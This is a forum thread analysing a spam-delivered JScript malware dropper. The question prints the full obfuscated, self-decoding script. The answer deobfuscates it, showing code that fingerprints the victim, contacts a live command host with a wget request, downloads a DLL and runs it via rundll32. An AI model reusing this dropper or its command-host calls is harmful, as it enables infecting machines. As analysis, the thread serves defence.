
I've received some spam email that led to a JavaScript file which I assume is malicious.

My curiosity got the best of me so I opened the file in Notepad and I'm trying to make sense of the code, but I cannot decipher the PDF and hex parts.

I suppose the objective of the script is to generate a malicious PDF file using Microsoft's VB Script which is embedded in all Internet Explorers, being disabled by default on most recent versions but still available.

Here's the script:

'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';
var _0x8d0b=["\x7C","\x73\x70\x6C\x69\x74","","\x6C\x65\x6E\x67\x74\x68","\x66\x6C\x6F\x6F\x72","\x63\x68\x61\x72\x43\x6F\x64\x65\x41\x74","\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x6A\x6F\x69\x6E"];function decode(_0x39f5x2,_0x39f5x3){var _0x39f5x4=_0x39f5x3[_0x8d0b[1]](_0x8d0b[0]);var _0x39f5x5=_0x8d0b[2];function _0x39f5x6(_0x39f5x7,_0x39f5x8){var _0x39f5x9=_0x39f5x7^ _0x39f5x2[_0x8d0b[5]](Math[_0x8d0b[4]](_0x39f5x8% _0x39f5x2[_0x8d0b[3]]));_0x39f5x4[_0x39f5x8]= String[_0x8d0b[6]](_0x39f5x9)}for(var _0x39f5x8=0;_0x39f5x8< _0x39f5x4[_0x8d0b[3]];_0x39f5x8++){var _0x39f5x7=_0x39f5x4[_0x39f5x8];_0x39f5x6(_0x39f5x7,_0x39f5x8)};return _0x39f5x4[_0x8d0b[7]](_0x8d0b[2])}
var stream = WScript.CreateObject('ADODB.Stream');
var code = "15|15|20|23|50|39|91|87|60|77|31|3|36|38|118|127|84|16|30|0|58|33|94|107|124|13|109|25|103|94|43|108|70|79|108|90|40|27|29|37|20|35|50|109|38|53|7|54|16|112|55|85|112|67|35|61|110|104|66|100|46|55|58|84|115|19|54|104|83|89|80|64|42|65|10|45|55|33|33|91|26|106|40|62|67|98|93|106|96|21|45|37|2|54|9|115|16|55|7|32|29|63|65|92|44|26|34|7|31|18|45|51|44|44|84|5|27|127|35|33|11|19|5|44|23|55|2|120|123|61|23|41|109|99|124|22|34|68|110|22|85|35|17|2|47|28|29|36|2|25|121|101|58|111|74|97|93|58|72|14|78|67|68|79|48|64|87|122|26|63|1|121|72|89|27|31|52|47|24|18|23|83|107|120|116|88|78|122|108|114|113|44|37|28|5|106|5|26|31|3|16|14|120|64|117|111|80|65|91|85|98|58|23|65|94|40|29|77|124|31|16|0|12|36|27|118|21|68|102|83|81|124|69|17|53|46|8|61|24|17|105|22|17|23|21|2|118|95|61|109|49|70|104|18|3|2|82|56|8|109|7|24|67|0|12|43|51|13|89|10|29|90|79|61|92|111|96|72|123|97|47|10|80|18|44|40|56|86|99|63|61|34|13|1|21|17|71|2|35|40|53|1|39|46|4|70|79|77|113|123|26|127|102|98|115|102|72|52|4|63|65|9|113|95|69|10|47|66|13|90|39|31|71|48|75|95|80|76|108|33|9|6|0|99|65|96|121|10|22|110|73|126|82|64|85|78|106|91|95|107|81|18|66|20|50|41|30|71|28|58|71|87|109|4|85|19|43|88|111|75|18|5|52|28|84|36|56|66|53|34|98|5|109|6|86|43|85|63|46|13|87|94|78|102|126|42|93|66|101|68|71|86|122|83|93|24|17|2|17|3|17|102|5|38|70|25|115|67|79|119|27|39|6|31|10|86|24|19|24|32|52|22|31|83|51|51|94|44|10|101|5|66|82|4|29|21|0|1|54|47|67|42|75|36|28|57|58|48|4|55|18|57|63|78|26|27|120|71|78|81|95|82|120|76|97|84|81|90|68|12|86|9|66|84|17|63|46|32|21|64|28|122|47|121|48|33|39|63|1|10|53|42|56|18|28|4|20|21|88|118|44|33|37|5|11|66|63|87|95|121|38|22|85|24|62|6|56|13|67|40|65|31|26|58|47|1|35|1|2|126|121|69|13|92|99|93|69|76|111|101|104|14|106|51|91|58|107|71|69|70|106|95|111|93|74|75|82|66|6|19|61|37|31|41|114|36|25|63|63|111|18|7|32|35|102|57|88|92|63|80|100|47|125|65|122|124|80|99|55|24|4|109|89|102|23|56|6|87|35|0|38|55|110|17|26|110|70|94|74|100|21|92|38|2|14|90|53|44|55|26|53|71|74|98|72|106|12|97|
115|77|113|86|114|77|120|51|10|70|89|36|15|28|69|28|126|85|116|120|51|76|35|3|35|29|14|81|93|77|54|106|67|14|29|27|87|59|85|64|90|124|105|92|106|121|72|121|82|83|79|112|69|20|102|99|114|116|107|31|3|38|58|20|69|3|11|97|23|13|122|72|78|113|35|25|35|16|39|15|39|37|62|54|0|7|127|17|88|37|39|49|2|15|45|35|69|103|0|120|97|49|24|41|7|53|34|57|38|124|117|69|108|9|87|121|57|67|24|21|16|19|99|97|83|69|111|102|89|59|43|13|37|65|37|33|116|49|37|10|49|1|111|27|39|37|86|31|119|121|111|112|112|18|96|90|68|81|80|86|18|126|40|82|124|72|40|17|8|45|69|58|53|15|77|15|2|44|23|124|1|122|95|80|66|101|24|49|58|108|50|18|77|85|53|16|87|107|84|46|57|53|2|74|92|15|22|5|59|121|29|55|13|65|20|5|109|10|115|75|115|76|74|44|88|67|4|48|98|14|46|86|111|114|93|95|48|31|34|3|121|28|12|11|76|41|33|100|85|84|84|23|15|87|101|83|58|79|46|35|42|114|69|32|69|16|31|15|126|65|68|57|107|98|11|12|12|14|33|86|85|44|32|36|24|81|10|73|33|24|71|123|124|98|122|127|49|127|7|80|74|77|90|27|25|97|126|72|102|18|24|13|29|55|92|60|28|60|6|17|94|35|21|13|3|41|46|90|18|38|53|55|63|122|6|32|108|49|72|0|3|37|2|17|49|95|68|82|94|106|29|97|73|59|121|64|75|112|106|26|93|54|25|65|22|111|68|18|24|66|37|51|114|116|124|62|127|77|124|90|77|83|71|105|52|57|61|88|111|68|82|26|26|33|46|8|63|34|31|101|50|126|63|64|97|106|125|98|83|47|59|47|50|54|32|25|26|16|95|63|111|124|60|124|100|55|24|16|16|18|51|15|39|117|95|116|28|43|60|27|76|89|91|49|111|25|121|17|77|29|27|89|6|10|116|2|23|56|91|99|47|84|120|65|22|3|53|45|38|13|8|108|23|38|15|15|18|65|19|52|16|53|46|59|18|58|55|3|14|114|87|72|110|122|94|98|56|78|114|17|88|33|33|59|5|53|11|122|35|69|72|101|96|122|101|17|18|95|99|71|84|67|48|34|60|16|108|60|93|101|90|110|101|112|98|42|57|5|9|36|47|9|87|65|105|41|43|30|83|91|57|97|61|76|69|95|71|22|121|104|76|88|88|100|60|84|58|35|98|80|23|42|21|89|83|21|28|59|26|65|49|22|124|19|123|74|58|123|113|123|92|80|102|76|87|100|113|83|22|70|81|24|17|58|86|103|6|32|88|26|39|91|39|62|36|26|66|75|118|56|64|108|125|112|99|17|122|108|80|97|106|107|68|86|38|31|31|
106|4|9|63|66|112|111|98|1|32|35|67|47|102|2|81|61|14|126|113|87|67|79|122|56|71|121|65|104|16|83|72|110|67|82|52|0|51|97|3|38|98|114|119|10|27|1|53|55|12|33|47|27|32|115|5|121|86|108|74|107|67|48|104|111|120|89|18|59|96|57|121|49|81|74|77|111|65|20|90|30|66|24|28|54|0|118|9|62|86|20|35|124|68|100|92|125|114|89|20|121|63|44|58|53|65|49|39|41|72|111|67|9|57|28|86|43|41|43|66|15|119|76|57|110|90|113|107|71|102|108|22|24|19|88|12|32|100|108|78|6|20|3|98|9|15|73|76|71|77|96|82|66|62|59|112|117|79|117|101|81|23|18|53|88|27|122|119|86|17|23|63|25|54|58|80|121|76|104|109|103|102|103|24|80|25|74|69|68|19|88|70|51|63|43|22|100|25|53|53|100|111|26|70|2|32|7|38|88|126|68|7|72|101|110|61|70|60|104|120|79|122|66|115|84|85|70|31|20|85|43|75|58|120|1|0|83|53|75|39|18|25|11|43|35|7|70|114|69|77|52|22|20|16|74|55|4|34|21|74|100|60|71|68|48|82|72|75|90|81|104|74|117|56|43|2|3|44|90|25|44|43|97|71|19|106|19|95|37|39|38|25|57|39|19|122|71|27|43|41|119|53|64|125|106|104|70|115|19|111|115|74|116|82|65|35|70|71|4|95|75|1|42|60|63|25|122|17|8|102|100|67|106|122|38|44|24|29|35|33|43|14|27|45|11|12|93|94|90|103|94|74|59|74|80|78|17|53|93|126|89|102|97|123|73|89|122|23|104|97|18|60|42|6|33|62|48|62|22|56|72|102|109|67|77|21|66|82|49|38|54|46|45|46|33|39|86|98|7|38|59|16|67|49|72|107|107|121|94|83|67|22|77|116|109|68|85|0|33|94|87|44|119|61|3|21|93|109|27|30|17|19|63|28|100|123|73|121|93|108|105|79|125|115|117|74|80|109|77|98|85|19|42|38|7|21|48|70|29|43|23|64|86|25|122|32|63|85|2|29|34|21|98|95|100|85|66|53|21|3|1|34|8|39|84|106|59|107|127|62|112|18|72|116|111|90|90|65|116|7|39|9|33|30|72|6|49|39|121|114|42|103|40|50|84|22|99|64|10|62|123|49|72|48|83|25|25|81|122|66|75|87|35|38|53|49|28|116|25|47|21|112|26|44|98|25|90|50|33|60|20|61|14|11|40|61|35|76|28|1|33|48|107|111|116|108|91|120|77|73|21|98|110|31|71|101|98|49|112|72|117|87|105|90|74|104|98|16|39|66|47|52|37|91|46|78|62|58|112|64|83|116|65|86|48|25|0|1|29|43|27|90|64|84|49|31|55|28|72|67|123|69|103|79|113|80|99|68|120|104|119|86|37|34|13
|39|111|122|28|13|3|5|116|14|101|22|42|59|87|85|113|23|112|80|102|123|78|127|74|72|115|24|19|103|22|101|118|28|10|32|17|98|18|34|11|40|8|112|30|68|37|81|46|4|66|54|53|111|124|68|117|57|67|74|87|54|53|30|58|21|112|125|100|65|110|112|74|90|122|76|81|18|112|75|16|35|33|19|17|78|59|114|107|114|83|41|116|102|58|14|48|46|56|2|11|5|64|81|46|42|8|84|127|108|68|102|80|115|57|108|106|103|117|103|119|108|83|48|9|6|83|98|64|97|0|54|98|109|107|111|57|6|27|44|6|37|89|94|85|10|75|114|99|85|75|113|99|97|108|118|79|103|24|81|67|67|61|12|57|42|1|99|50|34|49|87|119|45|24|23|45|78|2|23|43|13|58|45|12|27|17|26|9|50|84|72|82|107|94|92|68|103|99|92|83|90|77|77|76|74|73|83|126|77|75|19|112|69|108|104|108|79|52|89|93|65|6|85|109|57|70|113|73|86|114|66|62|13|34|11|13|58|12|57|123|93|3|117|82|79|92|93|102|108|83|89|87|107|113|105|37|92|42|16|111|116|15|53|97|101|54|27|42|10|37|26|23|98|98|65|64|61|81|112|58|114|101|106|25|44|66|109|109|90|100|83|67|110|50|65|68|93|66|80|102|18|69|107|65|127|62|68|92|76|94|101|20|42|115|1|112|12|113|7|38|1|47|4|16|62|22|102|77|25|92|58|60|70|120|75|108|118|65|57|81|10|105|97|110|45|11|75|22|20|75|14|103|59|61|57|80|31|60|45|8|24|126|45|100|22|96|43|47|62|114|13|28|100|33|37|22|22|57|9|120|83|92|126|90|74|84|120|49|17|1|42|98|67|32|46|56|7|110|52|25|119|88|54|22|59|11|116|21|107|87|61|18|26|56|107|115|57|60|27|33|18|122|103|110|40|97|27|30|85|26|87|96|50|68|64|76|111|70|108|90|86|6|7|40|56|25|104|55|35|8|112|118|54|27|53|5|38|27|82|75|46|12|31|104|79|120|13|16|15|0|7|42|43|38|56|21|119|14|25|119|46|23|14|63|52|89|84|87|101|96|62|78|113|77|81|14|15|14|71|35|74|47|114|51|120|99|51|93|56|1|10|29|93|94|111|78|75|60|77|49|115|99|119|67|109|45|46|114|68|38|40|39|42|19|62|119|43|89|107|24|111|29|58|44|22|54|43|118|121|101|81|69|2|125|81|76|95|109|99|118|90|19|114|82|109|67|65|20|87|38|30|38|1|70|45|44|46|41|45|75|94|125|68|126|65|91|106|113|80|77|28|6|95|60|48|27|30|120|31|70|73|8|33|66|20|78|38|27|26|64|1|16|24|121|1|121|119|10|79|0|41|33|26|25|37|50|55|35|42|42|48|7
1|8|59|79|102|91|87|73|116|119|70|46|16|31|37|45|78|36|6|62|36|49|123|2|54|23|119|110|14|10|63|96|88|76|5|68|60|71|101|74|123|45|7|22|113|117|19|30|56|5|17|2|48|42|63|109|28|89|27|43|25|58|100|79|59|104|115|0|87|49|116|68|70|48|61|50|4|119|5|19|87|31|49|105|41|62|59|36|39|56|60|71|101|29|28|26|96|102|111|99|79|52|3|53|18|50|14|88|76|80|56|111|84|77|114|28|8|0|19|3|56|92|49|74|89|99|19|50|121|97|24|43|75|94|24|14|53|33|33|63|22|27|85|43|75|70|60|59|95|25|105|16|114|18|83|4|79|1|22|64|104|83|89|38|46|56|32|48|0|35|2|126|0|88|0|11|121|55|49|3|17|66|36|126|82|86|67|0|97|100|100|69|91|66|118|121|91|101|72|23|68|80|84|25|46|24|87|31|48|40|66|120|101|87|22|67|12|73|41|42|7|65|13|9|54|45|18|56|77|96|31|111|122|124|63|121|16|82|22|82|69|36|5|90|52|51|32|37|14|99|102|104|99|84|83|110|101|0|59|59|80|17|85|54|98|93|111|73|92|81|81|67|106|23|78|3|71|61|23|38|93|45|84|106|106|16|13|27|32|127|81|111|89|65|81|21|104|116|66|93|32|23|67|85|110|2|16|53|18|38|24|48|6|51|96|54|91|57|70|89|5|54|34|66|85|56|76|111|70|99|85|81|73|18|18|57|5|110|76|97|82|51|28|24|111|32|65|47|35|68|4|122|121|30|15|53|60|124|102|104|126|65|120|73|101|54|92|37|27|0|59|121|114|15|2|17|44|22|14|78|37|3|56|120|59|82|10|40|72|53|44|31|71|13|88|42|11|50|111|17|86|46|17|55|64|2|110|121|120|94|62|21|52|82|109|126|23|11|62|121|114|15|86|45|65|36|32|31|49|45|35|90|64|63|84|97|122|122|77|74|71|71|66|78|44|94|93|104|103|92|69|1|21|41|14|13|22|60|109|31|101|56|11|33|22|40|110|86|98|125|24|104|18|72|103|118|112|82|35|4|36|123|38|121|21|110|47|53|48|47|97|84|100|55|20|5|3|0|27|37|109|20|48|51|84|114|38|99|19|21|58|10|18|21|58|111|110|33|25|113|2|38|20|17|45|17|45|56|43|22|48|23|96|109|29|124|110|109|33|31|62|51|17|22|35|30|25|15|31|63|86|50|24|35|37|54|12|42|123|6|37|82|89|100|75|86|8|14|53|5|10|126|45|103|6|103|14|13|9|111|51|16|99|125|9|14|16|28|63|121|30|126|95|89|66|4|52|82|28|21|35|48|105|69|17|13|47|61|14|54|11|42|16|8|39|12|38|39|11|11|15|46|27|6|26|34|32|29|58|19|27|82|13|31|35|58|20|6|38|52|93|95|28|38|27|102|35|4
|14|0|32|23|84|29|56|22|15|114|1|63|20|36|42|33|62|17|6|4|39|23|57|49|105|10|88|54|31|4|1|84|5|32|19|35|97|93|48|91|18|24|5|60|97|100|37|108|110|26|77|58|104|89|58|91|123|5|62|118|5|48|26|34|65|20|14|24|47|38|100|60|2|102|3|56|105|19|48|74|87|12|101|112|37|120|22|23|47|53|106|35|18|123|35|43|21|109|17|91|36|51|9|68|9|124|17|121|0|30|58|93|112|43|14|6|0|45|35|34|64|30|19|11|46|6|106|105|42|105|102|44|32|91|21|15|126|7|33|59|45|98|109|124|84|109|64|25|115|72|109|94|66|112|74|100|111|31|34|122|1|37|8|7|50|60|8|19|29|44|28|62|53|110|30|15|19|59|29|42|99|19|83|94|118|95|109|11|12|14|74|61|109|31|75|59|66|67|70|115|106|17|72|19|109|121|115|7|55|11|122|29|47|0|30|90|123|78|104|75|126|78|62|77|112|18|102|73|87|97|79|63|71|124|96|101|76|73|77|9|120|2|50|43|58|13|107|56|29|3|31|41|111|21|51|109|37|37|1|74|55|102|74|16|52|30|25|18|44|28|108|113|17|0|11|29|49|123|27|99|113|113|10|12|65|47|108|112|36|6|23|47|30|63|75|61|100|58|40|41|77|7|40|65|35|120|5|104|60|10|127|58|94|74|127|112|78|110|94|95|103|113|84|118|65|19|27|58|38|24|39|44|120|101|26|56|39|97|64|58|108|112|51|53|11|89|114|51|83|115|107|9|29|44|51|24|54|35|21|50|38|27|60|17|64|42|26|84|58|24|38|75|40|98|53|58|32|48|25|117|61|103|31|38|39|32|60|110|109|34|107|100|26|55|64|10|90|31|22|35|61|70|24|67|27|105|124|46|103|43|93|80|88|63|76|60|93|121|65|25|18|119|61|31|56|2|28|108|96|6|36|124|20|57|111|63|20|67|12|10|35|69|99|59|68|120|77|36|5|60|115|52|8|9|120|24|25|24|43|2|108|110|42|22|29|29|56|97|122|19|96|37|46|59|16|31|105|26|7|49|17|3|56|70|106|104|90|100|27|31|75|40|92|56|69|37|40|77|25|85|44|67|101|25|87|14|70|108|95|109|92|102|96|111|83|65|110|61|15|29|40|52|1|56|122|101|48|40|7|21|67|40|43|84|31|114|63|86|123|13|121|116|108|115|40|1|1|9|2|110|16|22|7|122|5|56|118|62|50|69|29|31|39|102|58|123|0|40|43|16|53|3|110|80|58|60|14|42|56|85|63|10|100|29|122|33|17|101|65|29|57|62|32|3|29|64|42|19|30|53|7|41|31|122|62|94|97|111|58|109|20|113|86|48|14|54|49|17|61|25|107|109|51|15|11|56|118|110|26|81|52|15|28|112|27|20|85|10|105
|32|0|122|56|54|15|9|90|50|24|15|11|34|101|5|34|112|18|61|53|114|109|64|45|20|8|6|23|34|54|68|36|55|19|32|43|71|4|19|112|35|120|57|86|110|25|43|25|15|91|14|76|85|31|116|89|15|10|20|69|97|85|127|106|76|107|71|115|116|72|69|103|101|89|82|89|103|19|63|127|37|121|3|58|18|5|62|126|24|55|97|27|51|17|58|36|26|102|91|109|69|78|88|36|124|25|36|40|13|2|16|25|44|112|46|11|99|11|106|111|54|22|4|74|15|55|82|110|79|123|78|121|37|35|32|21|23|50|38|27|23|111|96|94|65|84|60|15|0|45|67|51|82|37|81|16|79|108|113|40|122|11|118|34|16|100|0|13|12|41|6|67|50|40|26|53|119|106|106|22|110|82|78|120|107|87|85|71|113|118|66|81|18|107|115|24|9|46|38|120|8|69|63|25|125|34|96|96|37|8|73|37|54|1|91|27|28|118|11|102|62|31|23|1|43|127|30|16|30|18|127|59|100|71|16|12|115|6|9|62|121|69|43|116|0|33|14|10|31|16|112|3|28|100|51|40|11|17|41|62|12|106|6|32|63|40|98|20|40|49|109|15|20|37|6|99|45|31|36|14|62|16|121|91|21|21|8|33|19|109|86|46|43|71|110|93|99|69|121|98|90|126|113|12|42|60|112|25|6|31|122|3|38|17|32|18|86|44|33|70|4|55|58|5|17|57|114|118|110|65|116|11|5|48|22|31|18|100|24|22|44|29|28|91|59|111|107|58|35|122|122|23|22|122|55|81|92|127|76|119|83|74|110|59|77|115|67|118|112|57|26|23|106|115|26|5|45|5|57|49|117|5|56|127|29|58|118|17|55|109|19|9|33|82|27|15|29|13|8|9|2|2|39|35|44|3|24|6|17|92|49|5|31|47|6|30|11|83|3|24|125|124|2|67|44|31|70|53|16|103|107|79|15|120|108|81|72|121|113|78|49|76|69|106|102|81|109|72|61|94|96|30|10|14|22|48|22|37|35|107|68|90|57|69|120|117|88|67|77|108|49|21|106|125|79|96|65|23|76|89|100|88|86|114|77|120|117|69|20|54|30|33|44|36|57|24|71|26|12|19|60|17|83|25|51|65|98|114|107|112|19|46|125|112|5|87|52|70|81|116|40|37|81|36|32|73|51|20|21|4|17|41|111|100|22|6|29|7|56|73|18|18|109|49|20|24|1|23|13|115|88|126|91|79|97|77|69|106|74|105|113|109|77|16|122|113|82|16|3|25|61|47|42|4|57|19|26|61|24|3|22|85|39|40|101|31|26|17|118|25|83|101|15|122|52|124|5|122|116|124|104|76|62|39|44|3|21|114|111|2|74|3|113|6|109|9|109|22|43|13|9|25|97|70|48|56|13|14|53|41|34|91|58|24|30|2|11|123|41|
28|18|46|49|20|89|108|57|59|96|91|60|51|15|77|73|76|103|84|124|83|76|88|83|70|102|103|112|104|108|112|75|25|16|79|57|30|48|92|13|20|14|33|37|125|53|64|51|7|24|126|63|115|111|19|116|100|60|18|69|28|24|30|70|123|106|88|108|98|117|83|77|66|113|93|95|126|37|12|51|24|34|50|90|108|17|28|8|59|86|46|107|22|14|34|10|17|27|19|127|5|114|116|13|120|114|55|126|21|88|49|4|30|14|58|87|37|48|112|46|120|27|122|97|49|16|10|100|66|58|76|114|81|72|83|86|24|127|124|60|92|78|87|3|17|13|15|39|119|39|38|63|81|5|38|19|34|0|73|15|109|96|49|15|62|123|105|47|75|74|77|77|83|58|72|116|100|115|76|121|108|118|121|88|76|126|110|106|97|74|73|57|37|69|23|34|106|28|74|19|69|79|102|58|113|50|59|125|98|74|114|74|67|116|124|62|4|85|36|34|53|52|110|12|43|34|45|59|25|95|57|101|121|72|39|72|120|56|95|37|58|95|21|107|0|23|38|61|0|118|123|110|37|47|60|4|12|8|89|40|76|14|76|15|79|109|89|64|82|88|103|84|32|51|4|109|11|119|102|81|20|96|100|92|81|1|56|82|95|88|71|84|76|96|51|99|99|91|82|119|80|88|101|67|97|97|72|65|83|30|57|61|96|91|29|97|20|55|7|35|97|88|49|42|18|53|57|125|113|7|77|72|110";
stream.Type = 2;
stream.Charset = 'us-ascii';
stream.Open();
stream.LoadFromFile(WScript.ScriptFullName);
stream.Position = 0;
var text = stream.ReadText(3669);
var decoded = decode(text, code);
eval(decoded);

What does it do?

  • It seems like the deobfuscated code would be in the `decoded` variable. Remove the last `eval` and dump that variable instead. I would still do it in a VM just in case somehow the decode function could execute the malicious code. – André Borie Jun 26 '16 at 02:27
  • Which part of this looks like a PDF to you? I don't see it. –  Jun 26 '16 at 03:51
  • Not only should it be run in a VM but you should make sure that VM has no network access! – Julie Pelletier Jun 26 '16 at 04:40
  • And please avoid putting others at risk with your desire to investigate malware. This is not the type of thing that should be shared anywhere! – Julie Pelletier Jun 26 '16 at 04:45
  • I got far enough to find that it sends a request to `dmnhulie.xyz/?...` where the `...` contains version information and a host fingerprint. That gets a response containing an ID which is sent in a second request to the same host, which gets back a response that's a DLL and then the script tries to `rundll32` it with `WScript.Shell`. It contains the string `Crypter.dll` which gives a clue to what it would do if successful. The obfuscation is just a bunch of xor'ing things at the right offsets. Nothing about the Javascript is interesting. It's just a downloader for the real nasty stuff, the DLL –  Jun 26 '16 at 05:39
  • The DLL I got is identical to the one described here: https://www.virustotal.com/en/file/b13e274e8c191671fe58127b3d9461df16e10acc3ff02e698119e1e8eabd924e/analysis/ –  Jun 26 '16 at 06:18
  • Thank you, @WumpusQ.Wumbley for the information! I'll report the website I got this from to the Kaspersky Security Team and I would ask you to write it down as an answer so I can approve it. Sorry, I do not want to harm anyone. I thought that, since it's a JS, no one should be at harm unless they willingly execute this code in a vulnerable Internet Explorer. – Zeh Jun 26 '16 at 15:18


The first line 'iayQS28R... is a key to be XORed with the bytes given in the code variable. When interpreted by Javascript, it does nothing because it's just a string constant. But the script opens its own source file (something you can't do in pure Javascript, but you can with the extra packages that are available when Windows runs a Javascript script as a standalone program). When it reads its own source (the first 3669 bytes - which happens to be the length of the first line) the apostrophes and semicolon are included, so the first value in code (15) is XORed with the character code of the ' (39) to give 40, and the next value (also 15) is XORed with the character code of the i (105) to give 102, and so on. 40 and 102 are the character codes of ( and f. The decoded text starts with (function(GLOBAL, HOST, ID, V){.

The decoded text is passed to eval at the end, so it's more Javascript, the next stage of the malware execution. Here is a copy with the boring inner functions removed and replaced by comments explaining what they do. The interesting stuff is in the RUN and DEC functions, and in the arguments provided in the last line.

(function(GLOBAL, HOST, ID, V){

        GLOBAL["UTILS"] = {
                "OBJ":
                  /* an object that wraps WScript.CreateObject and
                     provides a slightly obfuscated call-by-number
                     interface to create these types of objects:
                        1 = "MSXML2.XMLHTTP",
                        2 = "ADODB.Stream"
                        3 = "WScript.Network"
                        4 = "WScript.Shell"
                        5 = "Shell.Application"
                        6 = "Scripting.FileSystemObject" */
                "XOR": /* string XOR function */
                "PRE": /* function to hexify a string */
                "UNP": /* function to unhexify a string */
                "STR":
                  /* an object that wraps ADODB.Stream and provides
                     a call-by-number interface to some methods:
                       0 = write
                       1 = readAsText
                       2 = loadFile
                       3 = saveFile
                       4 = close */
                "REQ":
                  /* a function that does a GET request with
                     MSXML2.XMLHTTP and writes the result to a STR
                     (wrapped ADODB.Stream) object which is returned */
                "DEC": function(data){
                        var stream = new GLOBAL["UTILS"]["STR"];
                    var file = WSH.ScriptFullName;
                    var pos = parseInt(data.substr(0, 4), 16);
                    var len = data.charCodeAt(4);
                    var data;
                    var key;

                    stream[2](file);
                    key = stream[1](pos, len);
                    data = data.substr(5);

                    return GLOBAL["UTILS"]["XOR"](key, data);
                },
                "RUN": function(){

                        try{
                                GLOBAL["UTILS"]["TMP"]  =  GLOBAL["UTILS"]["PRE"]([ID, V, GLOBAL["UTILS"]["OBJ"][0](3).ComputerName.toUpperCase(), GLOBAL["UTILS"]["OBJ"][0](4).RegRead("HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\InstallDate")].join("|"));
                                GLOBAL["UTILS"]["TMP"]  = GLOBAL["UTILS"]["REQ"]([HOST, GLOBAL["UTILS"]["TMP"]].join("/?"));

                                if(GLOBAL["UTILS"]["TMP"] === false){
                                WSH.Quit();
                            }

                            GLOBAL["UTILS"]["TMP"] = GLOBAL["UTILS"]["DEC"](GLOBAL["UTILS"]["TMP"][1]());
                            GLOBAL["UTILS"]["VAR1"] = GLOBAL["UTILS"]["UNP"](GLOBAL["UTILS"]["TMP"].split("|")[0]);
                            GLOBAL["UTILS"]["VAR2"] = GLOBAL["UTILS"]["UNP"](GLOBAL["UTILS"]["TMP"].split("|")[1]);
                            GLOBAL["UTILS"]["VAR3"] = GLOBAL["UTILS"]["UNP"](GLOBAL["UTILS"]["TMP"].split("|")[2]);
                            GLOBAL["UTILS"]["VAR6"] = GLOBAL["UTILS"]["UNP"](GLOBAL["UTILS"]["TMP"].split("|")[3]);


                        GLOBAL["UTILS"]["VAR4"] = GLOBAL["UTILS"]["OBJ"][0](5).Namespace(35).Self.Path + GLOBAL["UTILS"]["VAR2"];
                        GLOBAL["UTILS"]["VAR2"] = GLOBAL["UTILS"]["VAR4"].substr(0, GLOBAL["UTILS"]["VAR4"].lastIndexOf("\\"));
                                GLOBAL["UTILS"]["VAR5"] =  GLOBAL["UTILS"]["OBJ"][0](6);

                        if(GLOBAL["UTILS"]["VAR5"].FolderExists(GLOBAL["UTILS"]["VAR2"]) != 0){
                                WSH.Quit();
                        }

                    GLOBAL["UTILS"]["VAR5"].CreateFolder(GLOBAL["UTILS"]["VAR2"]);

                    GLOBAL["UTILS"]["TMP"]  = GLOBAL["UTILS"]["REQ"]([HOST, GLOBAL["UTILS"]["VAR1"]].join("/?"));

                        if(GLOBAL["UTILS"]["TMP"]){
                                GLOBAL["UTILS"]["TMP"][3](GLOBAL["UTILS"]["VAR4"]);
                                eval(GLOBAL["UTILS"]["VAR6"])
                            }

                        }catch(e){}
                }
        };

        return GLOBAL;

})(this, "https://dmnhulie.xyz", "b917aff9c439c45d78ac214d91e75186", "0.2.4_js")["UTILS"]["RUN"]();

Matching up the arguments in the last line with the parameters in the first, we see that HOST is https://dmnhulie.xyz, ID is b917aff9c439c45d78ac214d91e75186, and V is 0.2.4_js.

In the RUN method, this line:

GLOBAL["UTILS"]["TMP"]  =  GLOBAL["UTILS"]["PRE"]([ID, V, GLOBAL["UTILS"]["OBJ"][0](3).ComputerName.toUpperCase(), GLOBAL["UTILS"]["OBJ"][0](4).RegRead("HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\InstallDate")].join("|"));

creates an identifier that includes the ID and V constants, your computer's hostname, and an installation date. Obviously they are using this to keep track of machines they have infected. My guess for the ID constant is that it represents a particular payload that they've been paid to install on infected machines. Or maybe it represents a specific spam run, or possibly even a specific spam recipient address. V certainly looks like it could be an identifier for the infection method - the Javascript itself.

The 4 components are joined with a | separator and the whole thing is hex-encoded. I put together a test string like this:

b917aff9c439c45d78ac214d91e75186|0.2.4_js|STUPIDVICTIM|1000000000

and hex-encoded it, producing this:

62393137616666396334333963343564373861633231346439316537353138367c302e322e345f6a737c53545550494456494354494d7c31303030303030303030

and simulated the next line:

GLOBAL["UTILS"]["TMP"]  = GLOBAL["UTILS"]["REQ"]([HOST, GLOBAL["UTILS"]["TMP"]].join("/?"));

by doing this:

wget -O trojan_payload 'https://dmnhulie.xyz/?62393137616666396334333963343564373861633231346439316537353138367c302e322e345f6a737c53545550494456494354494d7c31303030303030303030'

That gives back a small file which is needed for the next stage.

The next line:

GLOBAL["UTILS"]["TMP"] = GLOBAL["UTILS"]["DEC"](GLOBAL["UTILS"]["TMP"][1]());

Calls the readAsText STR method to convert the stream to a string and then passes the result to the DEC method.

DEC expects the string to contain a number (pos) formatted as a hex string in the first 4 bytes, a length (len) in the next byte (not formatted as text), and the rest is an encoded payload. I got different values of pos and len when I repeated the request. It seems to be randomized.

The script again reads its own source code to find an XOR decryption key, this time using pos and len. In one of my attempts, the first 5 bytes of trojan_payload were 15194. That means the key starts at position 0x1519 = 5401 and is 52 bytes long (52 is the ASCII character code for the character 4 - the fact that the length byte is an ASCII digit is just a coincidence. It doesn't represent the number 4 here.)

The offset of 5401 bytes in the original script lands in the middle of the code string. Taking 52 bytes from that position you get 2|52|4|63|65|9|113|95|69|10|47|66|13|90|39|31|71|48| as the XOR key to decrypt the remainder of trojan_payload. The result of that decryption is

31623562656161303330346165663264313735343633643862356531636265366566343562663862|5c57697a4d6f7573655c506167652d506167652e646c6c|3030303031383837|474c4f42414c5b275554494c53275d5b274f424a275d5b305d2834292e72756e282772756e646c6c33322020272b20474c4f42414c5b275554494c53275d5b2756415234275d202b20272c23312027202b20474c4f42414c5b275554494c53275d5b2756415233275d29

which is returned by the DEC method.

Note to anyone trying to recreate this result: when you cut and paste the original script from the question, you must save it with CRLF line endings to have everything land at the correct byte offset.

That gets split into 4 parts at the | separators and each part is de-hexified with UNP. The parts are:

1b5beaa0304aef2d175463d8b5e1cbe6ef45bf8b

\WizMouse\Page-Page.dll

00001887

GLOBAL['UTILS']['OBJ'][0](4).run('rundll32  '+ GLOBAL['UTILS']['VAR4'] + ',#1 ' + GLOBAL['UTILS']['VAR3'])

